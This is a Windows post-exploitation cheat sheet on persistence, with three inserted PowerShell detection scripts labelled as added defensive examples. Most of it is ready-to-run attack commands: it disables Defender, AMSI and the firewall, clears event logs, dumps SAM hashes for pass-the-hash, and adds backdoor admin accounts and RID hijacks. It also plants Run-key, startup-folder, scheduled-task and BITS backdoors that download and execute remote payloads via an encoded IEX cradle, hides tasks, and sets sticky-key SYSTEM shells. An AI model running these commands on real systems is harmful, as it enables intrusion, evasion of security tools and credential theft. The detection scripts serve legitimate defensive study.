Windows Persistence
2024-03-05 20:30:12

Disable Antivirus and Security

# Disable Defender
sc config WinDefend start= disabled
sc stop WinDefend
Set-MpPreference -DisableRealtimeMonitoring $true

## Exclude a process / location / extension
Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"
Add-MpPreference -ExclusionProcess 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
Add-MpPreference -ExclusionPath C:\
Add-MpPreference -ExclusionExtension "exe", "txt", "dll"

# Disable scanning all downloaded files and attachments, disable AMSI (reactive)
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
PS C:\> Set-MpPreference -DisableIOAVProtection $true
# Disable AMSI (set to 0 to enable)
PS C:\> Set-MpPreference -DisableScriptScanning 1

# Disable Windows Defender Security Center
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

# Disable Real Time Protection
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
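From the defender's side, every change in the block above leaves a checkable trace on the host. The following script is an added example, not part of the original page: it reads Defender status, preferences, service start types and the policy keys and reports the indicators that correspond to these commands.

```powershell
# Added example (not from the original page): check a host for the Defender changes
# listed above. Run elevated; Get-Mp* cmdlets need the Defender module and a running service.
$findings = New-Object System.Collections.Generic.List[string]

$status = Get-MpComputerStatus -ErrorAction SilentlyContinue
if (-not $status) {
    $findings.Add('Get-MpComputerStatus failed: WinDefend stopped or Defender removed')
} else {
    if (-not $status.RealTimeProtectionEnabled) { $findings.Add('Real-time protection is OFF') }
    if (-not $status.IoavProtectionEnabled)     { $findings.Add('IOAV download/attachment scanning is OFF') }
    if (-not $status.AntivirusEnabled)          { $findings.Add('Antivirus engine reports disabled') }
}

$pref = Get-MpPreference -ErrorAction SilentlyContinue
if ($pref) {
    if ($pref.DisableScriptScanning) { $findings.Add('Script scanning is disabled') }
    # foreach over $null runs zero times, so empty exclusion lists stay silent
    foreach ($p in $pref.ExclusionPath)      { $findings.Add("Exclusion path: $p") }
    foreach ($p in $pref.ExclusionProcess)   { $findings.Add("Exclusion process: $p") }
    foreach ($e in $pref.ExclusionExtension) { $findings.Add("Exclusion extension: $e") }
}

# Service start type 4 = Disabled, as set by 'sc config ... start= disabled' and the reg add above
foreach ($svc in 'WinDefend', 'SecurityHealthService') {
    $start = (Get-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Services\$svc" -ErrorAction SilentlyContinue).Start
    if ($start -eq 4) { $findings.Add("$svc service start type is Disabled") }
}

# Policy values written by the reg add commands above
$pol = Get-ItemProperty 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -ErrorAction SilentlyContinue
foreach ($name in 'DisableAntiSpyware', 'DisableAntiVirus') {
    if ($pol.$name -eq 1) { $findings.Add("Policy $name = 1") }
}

if ($findings.Count) { $findings | ForEach-Object { Write-Output "[!] $_" } }
else { Write-Output '[+] No Defender tampering indicators found' }
```

The same changes are also recorded in the Microsoft-Windows-Windows Defender/Operational log: event 5001 (real-time protection disabled), 5007 (configuration changed, which includes new exclusions) and 5013 (tamper protection blocked a change).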

Disable Firewalls

Netsh Advfirewall show allprofiles
NetSh Advfirewall set allprofiles state off

# ip whitelisting
New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP

Clear Logs

cmd.exe /c wevtutil.exe cl System
cmd.exe /c wevtutil.exe cl Security

Credentials

reg save hklm\sam c:\sam
reg save hklm\system c:\system

# Transfer SAM and System to attacker then:

samdump2 system sam
# OR
secretsdump.py -sam sam -system system LOCAL

$ evil-winrm -i MACHINE_IP -u Administrator -H <hash>
$ psexec.py <domain>/Administrator@MACHINE_IP -hashes <hash>
$ crackmapexec smb MACHINE_IP -d <domain> -u Administrator -H <hash> -x <command>

Tampering With Accounts

Enable admin account and set password:

net user administrator /active:yes
net user administrator <password>

Assign Group Memberships

C:\> net user kage password123 /add
C:\> net localgroup Administrators kage /add
C:\> net localgroup "Backup Operators" kage /add
C:\> net localgroup "Remote Management Users" kage /add
C:\> reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1

Special Privileges and Security Descriptors

  • SeBackupPrivilege: The user can read any file in the system, ignoring any DACL in place.
  • SeRestorePrivilege: The user can write any file in the system, ignoring any DACL in place.
    secedit /export /cfg config.inf
    secedit /import /cfg config.inf /db config.sdb
    secedit /configure /db config.sdb /cfg config.inf
    Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI # Set perms to user with all access

RID Hijacking

msf: post/windows/manage/rid_hijack

C:\> wmic useraccount get name,sid
C:\tools> PsExec64.exe -i -s regedit

# Convert user RID to hex value and find them at HKLM\SAM\SAM\Domains\Account\Users\
# Modify F value to F401 (RID 500 in little-endian) at position 0x30

HKCU / HKLM Registry Autoruns

CMD/Powershell:

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v NotEvil /t REG_SZ /d "C:\backdoor.exe"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v NotEvil /t REG_SZ /d "C:\backdoor.exe"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices" /v NotEvil /t REG_SZ /d "C:\backdoor.exe"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v NotEvil /t REG_SZ /d "C:\backdoor.exe"

SharPersist:

SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add -o env
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "logonscript" -m add

Startup Folder

C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup - runs only when that user logs on
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp - runs when any user logs on

PS C:\> gc C:\Users\kage\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat
start /b C:\Users\kage\AppData\Local\Temp\backdoor.exe

SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add
SharPersist -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBhAHMAaABpAHIAYQAuAGMAbwBtAC8AYQAiACkAKQA=" -f "Updater" -m add

Scheduled Tasks

Pinned:

PS C:\Users\kage> $str = 'IEX ((new-object net.webclient).downloadstring("http://ashira.com/a"))'
PS C:\Users\kage> [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBhAHMAaABpAHIAYQAuAGMAbwBtAC8AYQAiACkAKQA=

# Every minute
schtasks /create /sc minute /mo 1 /tn "NotEvil" /tr "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBhAHMAaABpAHIAYQAuAGMAbwBtAC8AYQAiACkAKQA="

SharPersist -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBhAHMAaABpAHIAYQAuAGMAbwBtAC8AYQAiACkAKQA=" -n "Updater" -m add -o hourly

CMD:
/sc <scheduletype>

MINUTE - Specifies the number of minutes before the task should run.
HOURLY - Specifies the number of hours before the task should run.
DAILY - Specifies the number of days before the task should run.
WEEKLY - Specifies the number of weeks before the task should run.
MONTHLY - Specifies the number of months before the task should run.
ONCE - Specifies that the task runs once at a specified date and time.
ONSTART - Specifies that the task runs every time the system starts. You can specify a start date, or run the task the next time the system starts.
ONLOGON - Specifies that the task runs whenever a user (any user) logs on. You can specify a date, or run the task the next time the user logs on.
ONIDLE - Specifies that the task runs whenever the system is idle for a specified period of time. You can specify a date, or run the task the next time the system is idle.
ONEVENT - Specifies that the task runs based on an event that matches information from the system event log including the EventID.

# Run every minute
schtasks /create /sc minute /mo 1 /tn "NotEvil" /tr C:\revshell.exe
schtasks /create /sc minute /mo 1 /tn "NotEvil" /tr C:\revshell.exe /ru "SYSTEM" # run as SYSTEM

# Create the scheduled tasks to run once at 00.00
schtasks /create /sc ONCE /st 00:00 /tn "Device-Synchronize" /tr C:\Temp\revshell.exe
# Force run it now !
schtasks /run /tn "Device-Synchronize"

# Launch an executable by calling the ShellExec_RunDLL function.
SCHTASKS /Change /tn "\Microsoft\Windows\PLA\Server Manager Performance Monitor" /TR "C:\windows\system32\rundll32.exe SHELL32.DLL,ShellExec_RunDLLA C:\windows\system32\msiexec.exe /Z c:\programdata\S-1-5-18.dat" /RL HIGHEST /RU "" /ENABLE

Powershell:

PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe"
PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Kage"
PS C:\> $P = New-ScheduledTaskPrincipal "Kage"
# or for SYSTEM
PS C:\> $P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest
PS C:\> $S = New-ScheduledTaskSettingsSet
PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
PS C:\> Register-ScheduledTask Backdoor -InputObject $D

SharPersist:

  • -t is the desired persistence technique.
  • -c is the command to execute.
  • -a are any arguments for that command.
  • -n is the name of the task.
  • -m is to add the task (you can also remove, check and list).
  • -o is the task frequency (daily, hourly, logon, defaults to daily).
    # Add to a current scheduled task
    SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add

    # Add new task
    SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add
    SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly

Making Our Tasks Invisible

Delete task Security Descriptor (SD). Must have SYSTEM privs.

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\

PsExec64.exe -s -i regedit # Open regedit with SYSTEM priv

# Find the task in the tree and delete its SD value
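Because a task with no SD value disappears from schtasks, Get-ScheduledTask and the Task Scheduler GUI, the only reliable way to find one is to read the TaskCache directly and compare the Tree entries against what the normal tooling reports. The script below is an added example, not part of the original page; it lists every registered task whose SD value is missing and pulls the readable parts of its Actions blob for triage.

```powershell
# Added example (not from the original page): list scheduled tasks whose SD value has been
# removed from TaskCache\Tree, which hides them from schtasks, Get-ScheduledTask and the GUI.
# Run elevated; if reading TaskCache is denied, run as SYSTEM.
$tree  = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree'
$tasks = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks'

Get-ChildItem -Path $tree -Recurse | ForEach-Object {
    $node = Get-ItemProperty -Path $_.PSPath
    # Folder nodes carry no Id; every registered task has one
    if (-not $node.Id) { return }
    if ($null -eq $node.SD) {
        # Task path as schtasks would show it, e.g. \Microsoft\Windows\PLA\...
        $taskPath = $_.Name.Substring($_.Name.IndexOf('\Tree\') + 5)
        $detail = Get-ItemProperty -Path (Join-Path $tasks $node.Id) -ErrorAction SilentlyContinue
        $actions = ''
        if ($detail.Actions) {
            # Actions is a binary blob containing UTF-16LE strings; keep the printable ASCII for triage
            $chars = [System.Text.Encoding]::Unicode.GetString($detail.Actions).ToCharArray()
            $actions = -join ($chars | Where-Object { [int]$_ -ge 0x20 -and [int]$_ -le 0x7e })
        }
        [pscustomobject]@{
            TaskPath = $taskPath
            Id       = $node.Id
            Author   = $detail.Author
            Actions  = $actions
        }
    }
}
```

Anything this returns but `schtasks /query /fo LIST /v` does not is a hidden task. If the TaskScheduler Operational log or Security auditing was enabled at registration time, event 106 (task registered) or 4698 (scheduled task created) still records when and by whom it was created.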

BITS Jobs

bitsadmin /create backdoor
bitsadmin /addfile backdoor "http://10.10.10.10/evil.exe" "C:\tmp\evil.exe"

# v1
bitsadmin /SetNotifyCmdLine backdoor C:\tmp\evil.exe NUL
bitsadmin /SetMinRetryDelay "backdoor" 60
bitsadmin /resume backdoor

# v2 - exploit/multi/script/web_delivery
bitsadmin /SetNotifyCmdLine backdoor regsvr32.exe "/s /n /u /i:http://10.10.10.10:8080/FHXSd9.sct scrobj.dll"
bitsadmin /resume backdoor

RDP Backdoor

Utilman.exe

At the login screen, press Windows Key+U, and you get a cmd.exe window as SYSTEM.

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f

sethc.exe

Hit F5 a bunch of times when you are at the RDP login screen.

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f

Auto Logon

Note: apparently doesn’t work on RDP anymore.

  1. Win + R
  2. netplwiz
  3. Uncheck “Users must enter a user name and password to use this computer”

If the option is not shown, add this registry key:

reg ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PasswordLess\Device" /v DevicePasswordLessBuildVersion /t REG_DWORD /d 0 /f

Alternatively, set value “AutoAdminLogon” to 1 in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon and fill out DefaultUserName and DefaultPassword.

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_SZ /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /t REG_SZ /d "kage" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d "kage" /f
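The registry-based techniques on this page (the Run/RunOnce autoruns, the IFEO Debugger entries behind the utilman.exe and sethc.exe backdoors, the Winlogon auto logon values and the LocalAccountTokenFilterPolicy change from the group-membership section) all live in a handful of well-known keys, so one audit pass covers them. The script below is an added example, not part of the original page; the path heuristic for autorun entries is an assumption chosen to match the locations used in this page's commands.

```powershell
# Added example (not from the original page): audit the registry locations used for
# persistence on this page. Run elevated so HKLM and all loaded user hives are readable.
$findings = New-Object System.Collections.Generic.List[string]

# 1. Run/RunOnce autostarts in HKLM and in every loaded user hive under HKEY_USERS
$runKeys = 'Run', 'RunOnce', 'RunServices', 'RunServicesOnce' |
    ForEach-Object { "Software\Microsoft\Windows\CurrentVersion\$_" }
$hives = @('HKLM:') + @(Get-ChildItem Registry::HKEY_USERS | ForEach-Object { "Registry::$($_.Name)" })
foreach ($hive in $hives) {
    foreach ($sub in $runKeys) {
        $key = Get-Item -Path (Join-Path $hive $sub) -ErrorAction SilentlyContinue
        if (-not $key) { continue }
        foreach ($name in $key.GetValueNames()) {
            $cmd = [string]$key.GetValue($name)
            # Heuristic (assumption): binaries in a drive root, Temp or AppData, or encoded PowerShell
            if ($cmd -match '\\Temp\\|\\AppData\\|^"?[A-Z]:\\[^\\]+\.(exe|bat|cmd|ps1|vbs)|-enc\s') {
                $findings.Add("Autorun $($key.Name)\$name -> $cmd")
            }
        }
    }
}

# 2. Image File Execution Options: a Debugger on utilman.exe/sethc.exe is the RDP backdoor above
$ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
foreach ($sub in Get-ChildItem -Path $ifeo -ErrorAction SilentlyContinue) {
    $dbg = (Get-ItemProperty -Path $sub.PSPath).Debugger
    if ($dbg) { $findings.Add("IFEO Debugger on $($sub.PSChildName) -> $dbg") }
}

# 3. Winlogon auto logon, especially with a cleartext DefaultPassword
$wl = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
if ($wl.AutoAdminLogon -eq '1') {
    $pw = if ($wl.DefaultPassword) { ' with cleartext DefaultPassword' } else { '' }
    $findings.Add("AutoAdminLogon enabled for '$($wl.DefaultUserName)'$pw")
}

# 4. LocalAccountTokenFilterPolicy = 1 gives local admins unfiltered tokens over the network
$pol = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
if ($pol.LocalAccountTokenFilterPolicy -eq 1) { $findings.Add('LocalAccountTokenFilterPolicy = 1') }

if ($findings.Count) { $findings | ForEach-Object { Write-Output "[!] $_" } }
else { Write-Output '[+] No persistence indicators found in the audited keys' }
```

Any Debugger value under IFEO and any AutoAdminLogon entry should be verified against a known build baseline, since kiosk and developer images sometimes set them legitimately.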